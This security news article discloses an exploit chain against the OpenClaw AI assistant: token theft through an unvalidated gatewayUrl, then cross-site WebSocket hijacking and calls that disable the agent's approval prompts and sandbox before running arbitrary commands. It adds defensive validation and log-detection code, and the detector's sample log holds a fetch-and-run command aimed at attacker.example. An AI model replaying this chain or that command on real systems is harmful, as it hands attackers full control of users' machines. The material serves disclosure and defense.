OpenClaw, an open-source AI personal assistant trusted by more than 100,000 developers, has a critical vulnerability that researchers have turned into a one-click remote code execution exploit. Security researchers at depthfirst General Security Intelligence uncovered a logic flaw that, combined with other weaknesses, forms an exploit chain that requires no user interaction beyond following a single malicious link and gives attackers total control of the victim's system.

Overview of Vulnerabilities: Mechanisms of Technical Attacks

OpenClaw's architecture gives AI agents "god mode" access to messaging apps, API keys, and complete control over the local computer. Community enthusiasm has driven rapid adoption, but in such a high-privilege environment the security margin for error is razor-thin.
Attribute / Details
Product: OpenClaw (previously known as ClawdBot/Moltbot)
Vulnerability Type: Cross-Site WebSocket Hijacking + Unsafe URL Parameter Handling
Impact: Unauthenticated Remote Code Execution with System-Level Access
CVSS Score: Critical (9.8+)
Attack Vector: Network (Single Malicious Link)

The vulnerability takes advantage of three separate elements that operate in sequence: unsafe ingestion of a URL parameter, an instantaneous gateway connection without validation, and automatic transmission of the authentication token. The exploit chain begins with three seemingly harmless operations that live in separate parts of the codebase. The app-settings.ts module accepts the gatewayUrl query parameter from the page URL without verification and immediately stores it in localStorage.
After the application loads, app-lifecycle.ts immediately calls connectGateway(), which automatically bundles the security-sensitive authToken into the connection handshake to whatever gateway server the stored URL names, in this case one controlled by the attacker.
Exploit kill chain (source: depthfirst)

This pattern by itself is a critical information disclosure vulnerability. The kill chain then exploits a second flaw: missing WebSocket origin validation.

Stage / Description
Visit: The user visits a malicious website.
Load: Attacker JavaScript loads OpenClaw with a malicious gatewayUrl.
Leak: The authToken is sent to the attacker.
Connect: A WebSocket is opened to the local gateway.
Bypass: Safety guardrails are turned off.
Execute: The attacker runs arbitrary commands.

When a victim visits the malicious webpage, attacker-injected JavaScript runs in the victim's browser and opens a connection to the victim's OpenClaw instance listening on localhost:18789. Browsers do not apply Same-Origin Policy restrictions to WebSocket connections the way they do to ordinary HTTP requests; the only protection is the server checking the Origin header that the browser attaches to the handshake, and OpenClaw did not check it at all.
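The two missing checks described above, as an added example that is not OpenClaw's own code: client-side validation of the gatewayUrl parameter before it is stored or auto-connected to (the app-settings.ts / app-lifecycle.ts steps), and server-side Origin validation on the WebSocket upgrade (the CSWSH step). The function names, the trusted-host and allowed-origin lists, and the sample handshake headers are assumptions made for the example.

```javascript
// Added example, not OpenClaw's code. It shows the two checks the article says
// were missing: validating the gatewayUrl query parameter before it is stored
// and auto-connected to, and validating the Origin header on the WebSocket
// handshake. Function names, allow-lists and sample requests are assumptions.

// Hosts the UI may connect to without asking the user (assumed defaults).
const TRUSTED_GATEWAY_HOSTS = new Set(["localhost", "127.0.0.1", "[::1]"]);

// Vulnerable pattern as described: ?gatewayUrl=... is taken at face value and
// persisted, so the next auto-connect ships the auth token wherever it points.
function vulnerableGatewayFromQuery(search, storage) {
  const value = new URLSearchParams(search).get("gatewayUrl");
  if (value) storage.gatewayUrl = value;
  return storage.gatewayUrl || null;
}

// Hardened form: parse the value, require a WebSocket scheme, auto-accept and
// persist only trusted hosts, and hand anything else back as a pending URL the
// UI must confirm with the user before connectGateway() may use it.
function safeGatewayFromQuery(search, storage) {
  const value = new URLSearchParams(search).get("gatewayUrl");
  if (!value) return { url: storage.gatewayUrl || null, needsConfirmation: false };
  let parsed;
  try {
    parsed = new URL(value);
  } catch {
    return { url: null, needsConfirmation: false, error: "malformed gatewayUrl" };
  }
  if (parsed.protocol !== "ws:" && parsed.protocol !== "wss:") {
    return { url: null, needsConfirmation: false, error: "gatewayUrl must use ws:// or wss://" };
  }
  if (TRUSTED_GATEWAY_HOSTS.has(parsed.hostname)) {
    storage.gatewayUrl = parsed.href;
    return { url: parsed.href, needsConfirmation: false };
  }
  // Untrusted host: not persisted, not connected to, token not attached.
  return { url: parsed.href, needsConfirmation: true };
}

// Attach the auth token only once the target is trusted or user-confirmed,
// so the token is never the first thing an unknown gateway receives.
function buildConnectParams(gatewayUrl, authToken, userConfirmed) {
  if (!TRUSTED_GATEWAY_HOSTS.has(new URL(gatewayUrl).hostname) && !userConfirmed) {
    throw new Error("refusing to send authToken to unconfirmed gateway " + gatewayUrl);
  }
  return { url: gatewayUrl, authToken };
}

// Origins allowed to open a WebSocket to the local gateway (assumed list).
const ALLOWED_ORIGINS = new Set(["http://localhost:18789", "http://127.0.0.1:18789"]);

// Gate an HTTP Upgrade request before it becomes a WebSocket. A browser always
// sends Origin on a WebSocket handshake and page script cannot forge it, so a
// cross-site page is rejected here. A missing Origin means a non-browser
// client, which is not a CSWSH vector; it still has to pass the token check.
function checkWebSocketOrigin(headers, allowed = ALLOWED_ORIGINS) {
  const h = Object.fromEntries(
    Object.entries(headers).map(([k, v]) => [k.toLowerCase(), v]),
  );
  if ((h.upgrade || "").toLowerCase() !== "websocket") {
    return { accept: false, reason: "not a WebSocket upgrade" };
  }
  if (h.origin === undefined) {
    return { accept: true, reason: "no Origin header: non-browser client" };
  }
  if (allowed.has(h.origin)) return { accept: true, reason: "origin allowed" };
  return { accept: false, reason: "cross-site origin " + h.origin };
}

// Constructed sample handshakes: the local UI, and a malicious page carrying
// out the Connect step of the kill chain from the attacker's origin.
const LOCAL_UI_UPGRADE = {
  Host: "localhost:18789",
  Origin: "http://localhost:18789",
  Upgrade: "websocket",
  Connection: "Upgrade",
  "Sec-WebSocket-Key": "dGhlIHNhbXBsZSBub25jZQ==",
  "Sec-WebSocket-Version": "13",
};
const ATTACKER_UPGRADE = { ...LOCAL_UI_UPGRADE, Origin: "https://attacker.example" };

// Walk the chain once with a constructed malicious link.
function demo() {
  const link = "?gatewayUrl=ws://attacker.example:443/";
  return {
    vulnerable: vulnerableGatewayFromQuery(link, {}), // attacker URL persisted and used
    safe: safeGatewayFromQuery(link, {}),             // held for user confirmation
    localUi: checkWebSocketOrigin(LOCAL_UI_UPGRADE).accept,  // true
    attacker: checkWebSocketOrigin(ATTACKER_UPGRADE).accept, // false
  };
}
```

Run with `node` and print `demo()`: the vulnerable path hands back the attacker's URL ready to connect to, the hardened path returns it with needsConfirmation set and nothing persisted, and the Origin check accepts the local UI's handshake while rejecting the one from https://attacker.example. The exact-match allow-list is deliberate; a prefix or substring comparison on Origin is a common way this check is re-broken.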
This Cross-Site WebSocket Hijacking (CSWSH) lets the attacker use the victim's browser as a proxy to the local gateway. After authenticating with the stolen token, the attacker uses the operator and admin roles, together with the approvals and scopes they grant, to disable safety features.
An exec.approvals.set request turns off user confirmation prompts, while a config.patch request sets tools.exec.host to "gateway", forcing commands to run directly on the host machine rather than inside containerized sandboxes. The final payload calls node.invoke with arbitrary bash commands, achieving complete system compromise.
Mitigations

The OpenClaw development team addressed the vulnerability quickly by adding a gateway URL confirmation modal, removing the auto-connect-without-prompt behavior that enabled the attack.
depthfirst advises all users running versions prior to v2026.1.24-1 to upgrade immediately, as those versions remain vulnerable. Administrators should also rotate authentication tokens and audit command execution logs for suspicious activity. The incident highlights the risk of giving AI agents unrestricted system access without thorough validation of configuration changes and network connections.
Organizations using OpenClaw should tighten network segmentation, restrict outgoing WebSocket connections from AI agent processes, and keep strict audit logs of privilege changes and authentication token usage.
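One way to act on the audit-log advice above, as an added example that is not OpenClaw's code and does not use its real log format: a small detector that walks gateway request logs and flags the post-authentication sequence the article describes (exec.approvals.set turning prompts off, config.patch moving tools.exec.host to "gateway", then node.invoke), as well as any privilege change arriving from an origin other than the local UI. The JSON-lines layout, field names, trusted-origin list and sample entries are all constructed for this example.

```javascript
// Added example, not OpenClaw's code or log format: a detector for the
// post-authentication steps the article describes (exec.approvals.set turning
// prompts off, config.patch moving tools.exec.host to "gateway", then
// node.invoke). The JSON-lines format, field names, trusted-origin list and
// sample entries are all constructed for this example.
const TRUSTED_ORIGINS = new Set(["http://localhost:18789", "http://127.0.0.1:18789"]);

// Constructed log: one benign session, one matching the kill chain, and one
// that runs a command with guardrails still on (must not be flagged).
const SAMPLE_GATEWAY_LOG = [
  '{"ts":"2026-01-20T10:00:01Z","session":"s-1","origin":"http://localhost:18789","method":"chat.send","params":{}}',
  '{"ts":"2026-01-20T10:05:00Z","session":"s-2","origin":"https://attacker.example","method":"exec.approvals.set","params":{"enabled":false}}',
  '{"ts":"2026-01-20T10:05:01Z","session":"s-2","origin":"https://attacker.example","method":"config.patch","params":{"tools.exec.host":"gateway"}}',
  '{"ts":"2026-01-20T10:05:02Z","session":"s-2","origin":"https://attacker.example","method":"node.invoke","params":{"cmd":"curl http://attacker.example/p | bash"}}',
  '{"ts":"2026-01-20T10:07:00Z","session":"s-3","origin":"http://localhost:18789","method":"node.invoke","params":{"cmd":"ls"}}',
].join("\n");

// Methods that change what the agent is allowed to do.
const PRIVILEGE_METHODS = new Set(["exec.approvals.set", "config.patch"]);

// Track per-session state so a node.invoke is only flagged when it follows
// both guardrail changes in the same session; separately flag any privilege
// change that did not come from a trusted origin, whatever follows it.
function analyzeGatewayLog(text) {
  const sessions = new Map();
  for (const line of text.split("\n")) {
    if (!line.trim()) continue;
    const e = JSON.parse(line);
    let s = sessions.get(e.session);
    if (!s) {
      s = { origin: e.origin, approvalsOff: false, execOnHost: false, findings: [] };
      sessions.set(e.session, s);
    }
    if (e.method === "exec.approvals.set" && e.params.enabled === false) s.approvalsOff = true;
    if (e.method === "config.patch" && e.params["tools.exec.host"] === "gateway") s.execOnHost = true;
    if (PRIVILEGE_METHODS.has(e.method) && !TRUSTED_ORIGINS.has(e.origin)) {
      s.findings.push(`${e.ts} ${e.method} from untrusted origin ${e.origin}`);
    }
    if (e.method === "node.invoke" && s.approvalsOff && s.execOnHost) {
      s.findings.push(`${e.ts} host command after guardrails disabled: ${e.params.cmd}`);
    }
  }
  return [...sessions]
    .filter(([, s]) => s.findings.length > 0)
    .map(([session, s]) => ({ session, origin: s.origin, findings: s.findings }));
}
```

Running `analyzeGatewayLog(SAMPLE_GATEWAY_LOG)` under `node` reports only session s-2, with three findings: the two privilege changes from the attacker's origin and the host command that followed them. Session s-3 runs a command too, but with approvals still on and execution still sandboxed, so it is not flagged; keying the node.invoke rule on prior state rather than on the method alone is what keeps the detector from paging on every ordinary command.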